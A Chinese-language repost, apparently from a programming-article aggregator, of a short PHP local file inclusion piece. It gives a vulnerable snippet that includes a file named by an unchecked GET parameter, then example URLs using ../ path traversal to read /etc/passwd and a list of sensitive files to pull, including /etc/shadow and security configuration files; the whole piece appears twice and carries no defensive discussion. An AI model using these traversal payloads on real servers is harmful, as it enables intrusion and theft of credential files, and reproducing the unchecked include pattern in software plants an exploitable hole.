php 伪造本地文件包含漏洞的代码_php技巧
程序员文章站
2022-05-31 09:46:39
...
代码:
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
复制代码 代码如下:
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
上一篇: [PHP]PHP的session机制,配置与高级应用
下一篇: Oracle 修改字符编码
推荐阅读
-
PHP本地文件包含漏洞环境搭建与利用分析
-
php包含漏洞替代技术的方法与介绍 php文件包含漏洞详解
-
php实现从ftp服务器上下载文件树到本地电脑的程序_php技巧
-
生成ubuntu自动切换壁纸xml文件的php代码_php技巧
-
PHP FOR MYSQL 代码生成助手(根据Mysql里的字段自动生成类文件的)_php技巧
-
PHP统计目录下的文件总数及代码行数(去除注释及空行)_php技巧
-
利用PHP实现智能文件类型检测的实现代码_php技巧
-
遍历指定目录下的所有目录和文件的php代码_php技巧
-
用PHP伪造referer突破网盘禁止外连的代码_php技巧
-
php中批量替换文件名的实现代码_php技巧